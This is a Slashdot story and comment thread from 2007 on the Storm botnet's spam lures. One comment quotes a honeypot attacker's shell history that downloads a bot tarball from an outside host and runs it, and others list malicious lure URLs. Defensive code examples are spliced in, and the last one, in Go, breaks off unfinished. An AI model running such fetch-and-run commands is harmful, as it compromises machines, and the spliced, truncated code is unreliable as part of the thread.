Storm Botnet Is Behind Two New Attacks

Posted by kdawson on Sun Aug 26, 2007 11:51 AM
from the do-not-click-here dept.
We've gotten a number of submissions about the new tricks the massive Storm botnet has been up to. Estimates of the size of this botnet range from 250K-1M to 5M-10M compromised machines. Reader cottagetrees notes a writeup at Exploit Prevention Labs on a new social engineering attack involving YouTube. The emails, which may be targeted at people who use private domain registrations, warn the recipient that their "face is all over 'net" on a YouTube video. The link is to a Storm-infected bot that attacks using the Q4Rollup exploit (a package of about a dozen encrypted exploits). And reader thefickler writes that the recent wave of "confirmation spam" is also due to Storm, as was the earlier, months-long "e-card from a friend" series of attack emails.

Related Stories

[+] Storm Hits Blogger Network 89 comments
ancientribe writes "Researchers have discovered the Storm Trojan nestled in hundreds of blog sites in Google's Blogger network, according to an article in Dark Reading. And this isn't simple comment spam, but actual blogs that post spam, and now, Storm executable files. A researcher who's been tracking the Storm-infested blog sites says he's working with Google to clean up this latest appearance of Storm."
[+] Storm Worm More Powerful Than Top Supercomputers 390 comments
Stony Stevenson writes to mention that some security researchers are claiming that the Storm Worm has grown so massive that it could rival the world's top supercomputers in terms of raw power. "Sergeant said researchers at MessageLabs see about 2 million different computers in the botnet sending out spam on any given day, and he adds that he estimates the botnet generally is operating at about 10 percent of capacity. 'We've seen spikes where the owner is experimenting with something and those spikes are usually five to 10 times what we normally see,' he said, noting he suspects the botnet could be as large as 50 million computers. 'That means they can turn on the taps whenever they want to.'"
[+] Anti-Scammers Become Storm Botnet Victims 207 comments
capnkr writes "It looks like the efforts of the anti-scammers at sites like 419eater, Scamwarners, Artists Against 419, and possibly others have become the target of the Storm botnet. Spamnation has a post about it, and as of this writing none of the above listed sites are responding. Spamnation reports that CastleCops and other anti-spam forums are being DDoSed as well. Sounds like a massive, concerted effort against the folks who are fighting the good fight. Although I hate it for the owners and admins of the above sites, I think it shows without a doubt that their efforts to 'get back' at the scammers are working."
[+] Storm Worm Evolves To Use Tor 182 comments
An anonymous reader writes "Seems like the Storm botnet that was behind the last two waves of attacks is also responsible for this new kind of social-engineering based attacks, using spam to try and convince users of the necessity of using Tor for their communications. They 'kindly' provide a link to download a trojaned version of Tor. This blog entry has a link to the original post on or-talk mailing list which has some samples of the messages."
  • I wonder if the huge spike in spam from Tuesday is at all related to this botnet... It was crushing, we had so many users complaining about slow mail service, and it was traced back to a maxed out mail server diligently blocking the spam. The storm passed by Wednesday, but it did show us that we need to upgrade our infrastructure.

    I fscking hate SPAM!

  • Skynet... (Score:3, Funny)

    by Colin Smith (2679) on Sunday August 26, @12:00PM (#20363041)
    It's looking for more processing power...

    http://www.emhsoft.com/singularity/ [emhsoft.com]

    YKIMS!

     
  • by CopaceticOpus (965603) on Sunday August 26, @12:28PM (#20363265)
    I'm curious just how this works - what does a recipient of this email need to do to get infected?

    First they need to open the message. It should have gotten filtered into a junk folder (if not blocked altogether) so the user must be actually going through their junk mail folder and reading things. Who has time to waste on that?

    Now, I'd assume no one will get infected just by opening the mail. They'd have to at the very least click on the link. Will clicking be enough to infect a computer? Does it depend on the brand of browser and/or how recently it has been patched? Is the latest (Oh, let me pick a browser out of a hat here) IE6/IE7 in fully patched form still vulnerable?

    Now of course, if anyone is dumb enough to follow the link, AND accept an executable download, AND run that download, they will be infected. Is that what's actually happening here?
    • Re:How does the infection spread? by Lobster Quadrille (Score:2) Sunday August 26, @12:37PM
    • Re:How does the infection spread? by Chris Tucker (Score:1) Sunday August 26, @12:38PM
    • Re:How does the infection spread? by garcia (Score:2) Sunday August 26, @12:39PM
    • Re:How does the infection spread? (Score:4, Insightful)

      by pe1chl (90186) on Sunday August 26, @12:41PM (#20363405)
      Yes. But remember, the mail message pretends to be something like an e-card from a friend. You have to click on the link to see the e-card.
      Many naive users would really want to see the e-card their friend has sent (even though it is never mentioned who that friend may be) so they click the link.
      The next page explains they have to load some software. Not too unusual in the naive user's world. They visit websites all the time that tell them that they have to update their flash plugin, a codec, an active-x component, or whatever. They already click away those pop-ups that warn them before they have actually read them.
      Besides, the first page explains that they have to click OK and go through the installation or they will not be able to see the card. Who would want to turn down their friend and not view an e-card sent to them?

      So the trojan is downloaded and installed. No problem, because they are logged in as an administrator. Who sets up their system to use separate accounts for admin and use? Maybe 1% of users try that.

      So, the naive user very easily gets infected. Mainly because in the past they have seen so many useless pop-ups warning them about potentially harmful things that others have told them they should click away (like getting a warning when you delete something). A pop-up no longer is an alerting event that requires attention, it is just a stupid window that gets in the way of your "internet experience".
      Furthermore, most users are not prepared to think about security or to take extra steps to secure their systems (like using a separate account for software installation and system maintenance).
      • Re:How does the infection spread? (Score:4, Insightful)

        by Tom (822) on Sunday August 26, @01:09PM (#20363599)
        (http://web.lemuria.org/)

        Mainly because in the past they have seen so many useless pop-ups warning them about potentially harmful things that others have told them they should click away (like getting a warning when you delete something). A pop-up no longer is an alerting event that requires attention, it is just a stupid window that gets in the way of your "internet experience".
        Exactly. That's as if you had sensors in your clothes to ring a bell every time someone touches you, because he might be a pickpocket. I guarantee you that after one day in the city, you'll turn it off. Or if you can't do that, start to ignore it. Boom, suddenly you are an easier target than you would be without the "alarm system". You got desensitised.

        Oh, and also because most of those warnings are really not useful for the user. They shove the responsibility on the one person least suited to actually make the call. "Hey, loser, W32kdrv.dll wants to access 0xf4a50cb to do CrypicThing() which could result in Lengthytechnobabblethatsoundsverymuchlikethenonsenseyouhearonstartreck - do you now want to disallow it not doing it?"
      • Re:How does the infection spread? by ji777 (Score:1) Monday August 27, @10:17AM
    • Re:How does the infection spread? by houstonbofh (Score:2) Sunday August 26, @11:35PM
    • Re:How does the infection spread? by cottagetrees (Score:1) Monday August 27, @12:29AM
  • Arggg! (Score:4, Insightful)

    by JamesRose (1062530) on Sunday August 26, @12:30PM (#20363285)
    I hate these comments "Damn Microsoft and their inferior security". That's BS, the reason Windows gets hacked is because there are so many more MS machines than any other type of machine. Botnets are there to make money, the more machines they infect the more spam they produce, the more money they make. If you want to infect machines, you go for Windows because it has by far the most market share, so it returns the biggest profit. So all the people hacking machines aim at Windows, and multi-million dollar businesses solely aimed at hacking Windows, if any other operating system had that much focus given to it, it would collapse in days, so stop with all the shit about MS having bad security, they do quite a good job in the absolute worst circumstances and as a result only the stupid users get infections.

    ~Not AC cause I don't value my karma~
    • Re:Arggg! (Score:5, Insightful)

      by DaleGlass (1068434) on Sunday August 26, @12:37PM (#20363367)
      (http://daleglass.net/)
      Ok, and if you were a spammer, where would you rather host your spam bot? On grandma's Win98 box connected to a modem that occasionally comes online, or a big Linux/Solaris/whatever server on a DS3? Because while Linux may not be very popular as a desktop OS, it's certainly common as a server. And servers tend to have much better connections than a normal computer.

      Linux in its default configuration has no open ports and can be installed safely without a firewall defending it. Can't say the same about many MS OSes. Certainly not Windows 9x, of which there's still a lot of copies running out there (and not supported anymore, thanks MS!)
    • Re:Arggg! by Anonymous Coward (Score:1) Sunday August 26, @01:11PM
    • the reason Windows gets hacked is because there are so many more MS machines than any other type of machine.

      If that was the case, then why are Microsoft applications (like IIS) more often compromised than non-Microsoft applications even in areas where Microsoft is NOT dominant?

      Windows is inherently less secure than most of the competition in a number of ways.

      1. The Microsoft HTML control's use of ActiveX is inherently insecure and can not be fixed without breaking every application that uses the HTML control.
      1a. This insecure design was deliberate and Microsoft fought the Justice Department to a standstill rather than change or replace it.
      2. Windows requires a number of insecure services to run to perform routine operations.
      2a. There is no way to force these services to be run local-only without using a firewall.
      2b. This means that Windows Firewall has to be used to secure Windows to the same degree as a UNIX based system WITHOUT a firewall.
      3. Windows document formats are still based on serialized COM objects. It's even possible for them to include serialized COM objects in XML files.
      3a. Serialized COM objects can refer to or even contain insecure code that can be used for an attack.

      The idea that any one of these three issues and their consequent corollaries are accepted boggles my mind. The idea that they're defended by the claim that the only reason Windows is more often compromised is that it is more common...I can not conceive of the confusion in the mind that would lead to such a conclusion.
    • Argggg yourself and see how you like it. by Joseph_Daniel_Zukige (Score:1) Sunday August 26, @08:17PM
    • Re:Arggg! by RedHat Rocky (Score:2) Monday August 27, @08:58AM
    • We should just give up. by symbolset (Score:2) Sunday September 09, @10:49AM
    • Re:Weak, as I expected vs. my challenge... apk by jguthrie (Score:1) Sunday August 26, @02:34PM
    • Re:Weak, as I expected vs. my challenge... apk by frycarson (Score:1) Sunday August 26, @09:25PM
  • Now THESE guys... (Score:1)

    by Mr. Yetti (1139445) on Sunday August 26, @12:40PM (#20363397)
    (Last Journal: Sunday August 26, @12:54PM)
    ...are more like the "terrorists" the government keeps telling us to cower under our desks from. I don't spend every morning checking under my hood and in my trunk to see if some guy with his head in a towel (-- that was to make a point, not my opinion) has managed to sneak a bomb in there. I _do_, however, check my inboxes everyday to delete the 30-40 spam/infected emails that show up.
  • by DigiShaman (671371) on Sunday August 26, @12:41PM (#20363401)
    (http://www.fred08.com/)
    Unless you've got GFI or Symantec Mail Security, I'd suggest setting up IMF. It's a free spam filter included in Exchange 2003 SP2. Below is a link to get you started.

    http://www.petri.co.il/block_spam_with_exchange2003_imf.htm [petri.co.il]

    Obviously it doesn't prevent the spreading of SPAM, but it doesn't mean you have to live with the incoming onslaught.
  • Interesting Question (Score:3, Interesting)

    by spikedvodka (188722) on Sunday August 26, @12:56PM (#20363511)
    This whole scenario brings up a rather interesting question: Is this a Spam problem, or a virus problem?

    From my understanding there is no viral content in the message, so your virus scanner would have no reason to block the message. A Spam filtering company could well "pass the buck" and say that this is a virus problem, yes it's going to trigger on some spam rules, but "Where it's a virus problem, why create special rules for it"

    I can see this type of attack becoming more popular in the future, at least until this question is solved.
  • ... of all mankind. A distributed computing project for the benefit of the human race. Like, cracking blu-ray DRM or something.
  • by nick13245 (681899) on Sunday August 26, @01:16PM (#20363663)
    For instance, here's a recent attack to my honeypot (Running Slackware Linux)

    root@zomg:~# cat /home/webmaster/. ./ .bash_history .ssh/ ../ .screenrc .xsession
    root@zomg:~# cat /home/webmaster/.bash_history
    ssh localhost
    w
    cat /etc/hosts
    cat /proc/cpuinfo
    passwd
    cd /var/tmp
    ks
    l
    sl
    ls
    ls- all
    ls -all
    mkdir " "
    cd " "
    clear
    wget imaginez0r.xhost.ro/botme.tar.gz
    tar zxvf botme.tar.gz
    rm -rf botme.tar.gz
    cd .bot/
    PATH=.:$PATH
    bash

    These kinds of attacks happen every day, sometimes more than once a day. If you don't patch and secure your machine, or do stupid things like download and run binaries, it's gonna get owned. Doesn't matter what OS you run.

    • Re:It's not just windows they're exploiting... by MarkRose (Score:3) Sunday August 26, @02:41PM
      • Yeah, that link is just to an eggdrop-based bot. It connects to the irc channel and probably lets the next layer of the botnet know it's alive. This is one of many tools they use to fully exploit an open box. The bot probably has the ability to remote run commands. That script in the GP looked a lot like a human was doing the typing though, due to spelling errors, etc.

        As far as xhost, you can get a free account [xhost.ro] too :). Storm is pretty scary, and there's bad people out there wanting to use your computing resources illegally.

        Make sure you run logwatch and logrotate and md5 the logs when they rotate (and rotate frequently, like every minute). Then store the checksum somewhere innocent after rotating. Have logwatch automatically check the checksums on all existing logs and report on that also. hosts.deny everything but your own personal IP address (in hosts.allow) on all ports except those you need to do business. SSH ONLY, don't use telnet or other unencrypted connections. Don't allow root to connect from SSH. Don't allow su from ssh (if possible). Compile your own stuff (including your compiler), never run binaries. Use shadow passwords. Put all of your binaries on a read-only mounted partition, with /var /tmp on a read/write (this is pretty good to do if you have a stable setup, such as a web server). If you can't do that, break your services into virtualized boxes using Xen or VMware or something so you can quickly recover from a saved image if something does happen. Regularly nmap, nessus and satan your box for holes. Put a passive hardware sniffer between your box and the 'net to look for suspicious packets. Etc.

        Most of this is duh stuff and easy to do, and you should have it written in your procedures for building a new box. I believe the NSA has some guidelines also.
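        The checksum step in the list above (hash the logs when they rotate, park the digests somewhere else, have the nightly report re-check them) can be scripted. The Python below is an added example, not the commenter's tooling: it uses SHA-256 where the comment says md5, keeps the manifest as JSON, and works on a plain name-to-bytes mapping so the same functions serve both the rotate-time snapshot and the later verification; the sample log lines are constructed.

```python
"""Checksum rotated logs at rotation time and verify them later.

Added example. Uses SHA-256 rather than the md5 mentioned in the thread. The
manifest should be copied off the host (or at least off the writable log
volume): anything that can rewrite /var/log can rewrite a manifest kept
next to it.
"""
import hashlib
import json
import os


def digest(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def read_rotated_logs(log_dir: str) -> dict:
    """Return {filename: bytes} for already-rotated logs (auth.log.1, messages.2.gz ...).

    Heuristic: a rotated name carries a digit after the first dot. The live,
    still-growing log is skipped on purpose; its hash changes by design.
    """
    logs = {}
    for name in sorted(os.listdir(log_dir)):
        if any(ch.isdigit() for ch in name.split(".", 1)[-1]):
            with open(os.path.join(log_dir, name), "rb") as fh:
                logs[name] = fh.read()
    return logs


def build_manifest(logs: dict) -> dict:
    """Digest every rotated log; run this from the logrotate postrotate hook."""
    return {name: digest(data) for name, data in sorted(logs.items())}


def verify_manifest(logs: dict, manifest: dict) -> dict:
    """Compare the current rotated logs against a stored manifest.

    'modified'   content changed since the manifest was written
    'missing'    a file the manifest knows about is gone or renamed
    'unexpected' a rotated file the manifest never saw
    """
    report = {"modified": [], "missing": [], "unexpected": []}
    for name, expected in manifest.items():
        if name not in logs:
            report["missing"].append(name)
        elif digest(logs[name]) != expected:
            report["modified"].append(name)
    for name in logs:
        if name not in manifest:
            report["unexpected"].append(name)
    return report


def save_manifest(manifest: dict, path: str) -> None:
    with open(path, "w") as fh:
        json.dump(manifest, fh, indent=1, sort_keys=True)


def load_manifest(path: str) -> dict:
    with open(path) as fh:
        return json.load(fh)


# Constructed sample: a rotated auth log, and the same set after an intruder
# has scrubbed the line that records their login.
ORIGINAL_LOGS = {
    "auth.log.1": b"Aug 26 12:00:01 zomg sshd[4242]: Accepted password for webmaster from 192.0.2.77\n"
                  b"Aug 26 12:00:09 zomg sshd[4242]: session opened for user webmaster\n",
    "messages.1": b"Aug 26 12:00:00 zomg syslogd: restart\n",
}
TAMPERED_LOGS = {
    "auth.log.1": b"Aug 26 12:00:09 zomg sshd[4242]: session opened for user webmaster\n",
    "messages.1": ORIGINAL_LOGS["messages.1"],
}

if __name__ == "__main__":
    manifest = build_manifest(ORIGINAL_LOGS)
    print(json.dumps(verify_manifest(TAMPERED_LOGS, manifest), indent=1))
```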
    • Re:It's not just windows they're exploiting... by Cyrus (Score:1) Sunday August 26, @06:50PM
  • by v1 (525388) on Sunday August 26, @01:16PM (#20363669)
    (http://vftp.net/ | Last Journal: Saturday December 09 2006, @09:52PM)
    social engineering attack involving YouTube. The emails, which may be targeted at people who use private domain registrations, warn the recipient that their "face is all over 'net" on a YouTube video.

    I don't normally get much spam - maybe one every other week, but I've gotten two of those lately

    OMG, what are you doing man. This video of you is all over the net. go look at it... http://www.youtube.com/watch?v=lAC5mj7oew5 [youtube.com] (link goes to http://90.31.69.105/ [90.31.69.105])

    and

    LMAO, I cant believe you put this video online. Everyone can see your face there. LOL check it out yourself http://www.youtube.com/watch?v=ZKil6gyJXhQ [youtube.com] (link goes to http://79.178.78.71/ [79.178.78.71] )

    Look at all the retards with their owned boxes lowering our quality of life...
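    The two lures quoted above show the tell-tale mismatch: the visible text is a youtube.com URL while the real target is a bare IP address. As an added example (not part of this thread), the Python below parses an HTML mail body and flags anchors whose displayed URL points somewhere other than the href, or whose href is an IP literal; the sample body and the 192.0.2.10 address are constructed.

```python
"""Flag HTML e-mail links whose visible text is a URL that does not match
the real href, as in the YouTube lures quoted in the thread.

Added example; the sample mail body and 192.0.2.10 (TEST-NET) are constructed.
"""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url):
    """Hostname of a URL; bare 'www.example.com/...' text is treated as http."""
    if "://" not in url:
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def looks_like_url(text):
    return text.lower().startswith(("http://", "https://", "www."))


def suspicious_links(html):
    """Return one finding per anchor that deserves a closer look."""
    parser = LinkCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for href, text in parser.links:
        target = host_of(href)
        reasons = []
        # The lure: displayed URL says youtube.com, href goes elsewhere.
        if looks_like_url(text) and host_of(text) != target:
            reasons.append("displayed URL host differs from href host")
        # Compromised home machines are reached by raw IP, not by a name.
        if is_ip_literal(target):
            reasons.append("href points at a bare IP address")
        if reasons:
            findings.append({"href": href, "text": text, "reasons": reasons})
    return findings


# Constructed sample modelled on the lure quoted above (not a real message).
SAMPLE_EMAIL = """
<p>OMG, what are you doing man. This video of you is all over the net. go look at it...
<a href="http://192.0.2.10/">http://www.youtube.com/watch?v=EXAMPLE</a></p>
<p>Benign link for comparison: <a href="http://tor.eff.org/">http://tor.eff.org/</a></p>
"""

if __name__ == "__main__":
    for f in suspicious_links(SAMPLE_EMAIL):
        print(f["text"], "->", f["href"], ";", "; ".join(f["reasons"]))
```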
  • Idiot-proofing the ultimate tool (Score:5, Insightful)

    by quokkapox (847798) <quokkapox@gmail.com> on Sunday August 26, @01:29PM (#20363783)

    You know, I can go and buy a microwave oven and plug it safely into a standardized outlet and not electrocute myself or blow up my house. I can even buy a propane tank and fire up my grill without risking my life too much. I can buy a modern automobile and feel confident that if I drive it into a tree at 30 MPH or roll it over, I still have a reasonable chance of surviving. Most things have built-in standardized safety features and/or safe failure modes (within reason).

    These things I can buy are all tools, some with licensing or age restrictions attached, but all more-or-less idiot-proofed. The razor blades I bought recently to scrape paint off my windows even warned me that they were "razor sharp". Well duh.

    But the most sophisticated, most powerful, most versatile, general purpose tool we humans have yet invented, the networked personal computer, has been sold to and is used by millions of people without any training whatsoever and without any warnings outside of what one might pick up from the "Dangers in Cyberspace" fluff segment on the local news.

    People are using computers more and more to organize all of their critical financial information. A single security breach can have catastrophic, real consequences, if for example your identity is stolen and your credit is ruined after your bank accounts are drained overnight.

    All you have to do is click on one really bad link. Sometimes, not even that.

    This is just another example of how technology is changing human society in completely unpredictable ways. Back in the 80's, you might have worried about a virus wiping out your word processing file. Today, typing your username and password on an untrusted machine, even just once, can compromise your entire life, and ruin your future.

  • I must say, it's good to know where all that was coming from. I rarely get spam, as I use a mailserver with greylisting, and any spam I do get is generally filtered correctly using Amavis/Spamassassin and ClamAV. This greeting card stuff though has plagued me. It's been marked as spam alright, but it looks like the botnets are starting to use proper SMTP servers to relay now, rather than just one shot attempts to directly connect to mailservers on port 25. A lot of outgoing traffic on port 25 is blocked from most ADSL networks nowadays, so it's more common to have to relay through your ISP's, or another relay server. This is going to make greylisting redundant pretty soon, as it works purely on the basis that any client connection which fails first time, will try again later as per the RFCs. If the Bots are relaying through RFC compliant servers, then there really isn't any point in the greylisting anymore. It's just a technology that provides a little temporary relief from the problem. Nice to know why the greeting card stuff started and stopped so abruptly regardless.
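    The greylisting argument made in the comment above can be shown in a few lines. This added Python simulation (not the commenter's code) keeps the usual (client IP, sender, recipient) triplet table and answers first contact with a 4xx deferral; a bot that delivers directly and never retries gets nothing through, while the same message handed to an RFC-compliant relay is accepted on the retry. Hosts, addresses and timings are constructed.

```python
"""Greylisting in miniature: it defeats a bot that delivers directly in one
shot, but not the same spam handed to an RFC-compliant relay that retries.

Added example with constructed addresses (TEST-NET ranges) and timings.
"""
from dataclasses import dataclass, field

TEMPFAIL = "451 4.7.1 Greylisted, please try again later"
ACCEPT = "250 OK"

SENDER = "friend@example.net"
RCPT = "victim@example.org"
RELAY_IP = "198.51.100.25"   # the ISP's outbound relay (constructed)


@dataclass
class Greylist:
    min_delay: int = 300          # a retry sooner than this is still deferred
    max_wait: int = 4 * 3600      # a retry later than this starts over
    seen: dict = field(default_factory=dict)    # triplet -> first-seen time
    passed: set = field(default_factory=set)    # triplets already accepted

    def decide(self, now, client_ip, sender, rcpt):
        """SMTP reply for one delivery attempt at time `now` (seconds)."""
        triplet = (client_ip, sender.lower(), rcpt.lower())
        if triplet in self.passed:
            return ACCEPT
        first = self.seen.get(triplet)
        if first is None or now - first > self.max_wait:
            self.seen[triplet] = now          # unknown (or stale) triplet: defer
            return TEMPFAIL
        if now - first < self.min_delay:
            return TEMPFAIL                   # retried too eagerly: defer again
        self.passed.add(triplet)              # well-behaved retry: let it in
        return ACCEPT


def simulate_one_shot(gl, t0, infected_hosts):
    """Each bot connects directly, tries once, ignores the 4xx and moves on.

    Returns how many copies were delivered.
    """
    delivered = 0
    for i, host in enumerate(infected_hosts):
        if gl.decide(t0 + i, host, SENDER, RCPT) == ACCEPT:
            delivered += 1
    return delivered


def simulate_relayed(gl, t0, retry_after=900):
    """The bot submits through its ISP relay; the relay honours the deferral
    and retries later, exactly as a legitimate MTA would."""
    replies = [gl.decide(t0, RELAY_IP, SENDER, RCPT)]
    if replies[-1] != ACCEPT:
        replies.append(gl.decide(t0 + retry_after, RELAY_IP, SENDER, RCPT))
    return replies


if __name__ == "__main__":
    bots = ["192.0.2.10", "192.0.2.11", "192.0.2.12"]
    print("direct one-shot delivered:", simulate_one_shot(Greylist(), 0, bots))
    print("via compliant relay:", simulate_relayed(Greylist(), 0))
```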
  • After all this time and all these spams, isn't it fairly reasonable to assume that nearly everyone who is going to get their box owned by the trojan already has?

  • Does Storm Only Attack Windows? (Score:5, Insightful)

    by Nom du Keyboard (633989) on Sunday August 26, @02:09PM (#20364093)
    Does Storm only attack Windows? Likely yes, I'm sure. Shouldn't Microsoft be attacking this one specifically with their malicious software scanner that's part of every Windows Update?
  • Maybe it's just coincidence, but I've been bombarded with the e-card things for a while now, and the youtube thing for a couple of days or so. Since this story broke on Slashdot, I just checked the spam trap and I haven't had a single one for the last 12 hours or so...
  • Disconnect them (Score:2)

    by LordSnooty (853791) on Sunday August 26, @03:45PM (#20364957)
    Form a team of investigative experts. Find all the machines in a botnet and ask their ISP to disconnect them. If an ISP refuses to cooperate, get their upstream provider involved and start threatening disconnection for all users. They'll soon fall into line.

    Post reasons why this is a bad idea here. I'm beginning to have difficulty understanding why so little action is being taken.
  • Let's call it "Tabula Rasa" day, or since that name is the name of an upcoming game, let's just call it "Global Reformat Day". Everyone in the world reformats their computer on that day.

    Storm what? Yea, that's right, fuck you Storm, we just reformatted every computer connected to the internet today.

    Yea I know, good luck getting everyone on board. I just wish it were possible because even though I don't know who operates these Botnets if I were to find out I would absolutely LOVE to kick them in the nuts.
  • by Terrasque (796014) on Monday August 27, @04:52AM (#20369495)
    I tried taking a closer look at this bot thing, but couldn't find out how it worked.

    I set up a test system with a vmware'd winxp, running process monitor on the xp and wireshark on the host, wireshark only showing packets to and from the vmware xp's ip address.

    So I snapshot'ed it, ran the exe from the links, and .. nothing happened. It did some writes to a few files,

    C:\WINDOWS\spooldr.exe
    C:\WINDOWS\system32\spooldr.sys
    C:\WINDOWS\system32\drivers\tcpip.sys

    which looks scary enough. But apart from that, nothing seems to have happened. Nothing in wireshark, and nothing on the machine.
    I rebooted the vmware xp and let it stand for a few hours. Still nothing at all. Only traffic in wireshark was smb announces, and nothing happened at the vmware. So, if this is a bot and/or a spam sender. How does it communicate? How does it send spam? How does it work?
  • Great... (Score:1)

    by Ub3rT3Rr0R1St (920830) on Monday August 27, @03:19PM (#20375741)
    Just great! How am I supposed to kick off my anonymous online greeting card company now?! Thanks a lot Storm!
  • by theolein (316044) on Sunday September 09, @11:02AM (#20528881)
    The domain play3w.com seems to be involved in the hosting of questionable software in the form of a so-called media player that installs trojans onto one's software. A cursory search on the internet reveals that there are many media files floating around the internet, some legal, some obviously not, which are supposedly encoded with a codec used by this player, called w3player or 3wplayer. The media files seem to only display a message directing one to the site download.play3w.com [play3w.com] in order to download the software, which, upon installation throws up a warning about a trojan being installed. In light of the current storm botnet growing to enormous proportions it is very likely that the site is involved in this in some way, given the wide distribution and use of bittorrent. This play3w scam seems to be widespread enough in fact, that there are other sites on the net that are also seeming to jump in on the act, such as mindcut.net [mindcut.net] (see 3wplayer link and almost everything on that site, in fact).

    There is probably no better way to spread trojans and viruses these days than by way of bittorrent scams.
  • We sent this notice to slashdot days ago as a story, but it wasn't apparently interesting enough to post then...

    ====
    The Tor Project, a US non-profit organisation producing Internet
    privacy software, is issuing an urgent warning about a spam email
    being circulated as a fake promotion for their software.

    The real Tor software provides privacy on the Internet to journalists,
    bloggers and human rights activists all over the world. The spam email
    promotes the virtues of the software, but then directs people to a
    series of fake websites that contain malicious code that will attempt
    to take over visiting machines, and the downloaded software is fake
    and equally dangerous to run.

    The real website is hosted at http://tor.eff.org/ [eff.org] and the Tor
    software can be downloaded from there. Users are able to check that
    they have received the official version by following the instructions
    at: http://wiki.noreply.org/noreply/TheOnionRouter/VerifyingSignatures [noreply.org]

    Shava Nerad, Development Director for the Tor Project said, "I am
    disgusted that criminals who want to recruit more machines for their
    illegal activities should trade on our reputation for providing
    privacy on the Internet. Fortunately we already have systems in place
    so that people can verify that they are downloading the official
    software. But this is a distraction from our work that we could do
    without."
    ====

    This attack does not, as reported elsewhere, download a trojaned version of Tor *or* use our network. All it (ab)uses is our reputation.

    Shava Nerad
    Development Director, The Tor Project
  • Re:Ha! (Score:5, Insightful)

    by jcr (53032) <jcr.idiom@com> on Sunday August 26, @12:00PM (#20363039)
    (Last Journal: Sunday November 05 2006, @05:31AM)
    We don't get infected, but UNIX users still have to deal with the spam that the botnets are spewing.

    I am really bloody sick of Microsoft's shoddy work. The spammers are arsonists, but Microsoft are the company that keeps building the houses out of gasoline-soaked balsa wood and flash paper.

    -jcr

    • Re:Ha! (Score:5, Insightful)

      by Jugalator (259273) on Sunday August 26, @12:29PM (#20363281)
      (Last Journal: Monday February 13 2006, @07:11PM)
      The spammers are arsonists, but Microsoft are the company that keeps building the houses out of gasoline-soaked balsa wood and flash paper.

      OK, since you used the word "keeps building", I assume this is about more like Vista than Windows 95.

      But if a trojan in Vista asks you to elevate its privileges (due to UAC) to run administrative tasks such as installing itself in the system, and the user clicks yes, what should happen instead? This would be equivalent to a Linux user getting an email telling him he needs to run some shady software under root privileges, and the user saying "yes please, do that now".
      • Re:Ha! by Jartan (Score:2) Sunday August 26, @12:51PM
        • Re:Ha! by SpecTheIntro (Score:2) Monday August 27, @10:07AM
      • Re:Ha! by Tom (Score:3) Sunday August 26, @01:04PM
      • Re:Ha! by pizzach (Score:2) Sunday August 26, @01:32PM
        • Re:Ha! by parkrrrr (Score:2) Sunday August 26, @05:59PM
      • Re:Ha! by DigiShaman (Score:3) Sunday August 26, @02:57PM
        • Re:Ha! by bane2571 (Score:1) Sunday September 09, @08:56PM
      • Re:Ha! by mattpalmer1086 (Score:2) Sunday August 26, @03:56PM
      • Re:Ha! by houghi (Score:2) Sunday August 26, @04:15PM
        • Re:Ha! by spikedvodka (Score:2) Sunday August 26, @07:21PM
    • Re:Ha! (Score:4, Insightful)

      by kabdib (81955) on Sunday August 26, @12:52PM (#20363481)
      (http://www.dadhacker.com/)
      If Unix / Linux was the dominant operating system of the day, who would you be blaming? Because this is purely a matter of the number of machines in the field; it's how attractive the target is.

      Let's say that Windows was magically replaced by (say) Ubuntu installs tomorrow, all over the world, with the best known default configuration in terms of being secure. Within a day you'd have exploits, and rapidly growing botnets.

      Ideally, *you* would then be ranting about the morons who wrote the kernel, the idiots who did the filtering and mail clients, the jerks who designed the network protocols, and the nincompoops who can't rub two curly braces together without creating a security hole.

      Or you could do some research and realize that this stuff is just bloody hard to get right. By anyone. By people who have been doing this their entire careers.

      Look, the security holes are *already there* on other platforms. Why aren't you ranting about them?

      Meh.

      • Re:Ha! (Score:4, Interesting)

        by cp.tar (871488) <cp.tar.bz2@gmail.com> on Sunday August 26, @01:13PM (#20363643)

        Well, one point in favour of Linux security is the central software repository for each and every distro.

        Linux users typically will not - even when the popularity of Linux rises - install random cursors, free smilies and whatnot - simply because they'll be used to installing things from the repository.

        And it's quite simple to hammer that into people's heads: the software from the repository is safe. Other software is not.

        There is still nothing similar in the Windows world.

        • Re:Ha! by Yoozer (Score:1) Monday August 27, @06:40AM
        • Re:Ha! by Culture20 (Score:1) Monday August 27, @11:28AM
      • Re:Ha! by jcr (Score:2) Sunday August 26, @02:22PM
        • Re:Ha! by coryking (Score:1) Sunday August 26, @06:35PM
        • Re:Ha! by kabdib (Score:2) Sunday August 26, @09:43PM
          • Re:Ha! by jagdish (Score:1) Sunday August 26, @11:06PM
    • Re:Ha! (Score:5, Insightful)

      by TheRaven64 (641858) on Sunday August 26, @12:15PM (#20363165)
      (http://theravensnest.org/ | Last Journal: Sunday October 07, @07:05AM)
      Use TCP/IP stack fingerprinting and drop all packets from Microsoft operating systems at the edge of your network until they fix their OS?

      We've found solutions; don't use shoddy software. The problem is all of the people who haven't switched yet.

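Passive OS fingerprinting of the kind the comment proposes, shown as an added example in Go (my code for this page, not anything from the thread or from p0f): it reads the initial TTL and the TCP option order out of a raw IPv4 SYN and labels the sender Windows-like or Linux-like. Both packets are constructed inline to resemble a Windows XP-era and a Linux 2.6-era SYN a few hops out; the two signature strings and the hop allowance are simplified assumptions, real fingerprinters carry hundreds of signatures and also weigh window size, MSS and the DF bit.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
	"strings"
)

// SynFeatures holds the SYN fields passive fingerprinters such as p0f key on.
type SynFeatures struct {
	TTL     uint8
	Window  uint16
	Options string // option kinds in wire order: M=MSS N=NOP W=WScale S=SACKok T=TS
}

var optionNames = map[byte]string{1: "N", 2: "M", 3: "W", 4: "S", 8: "T"}

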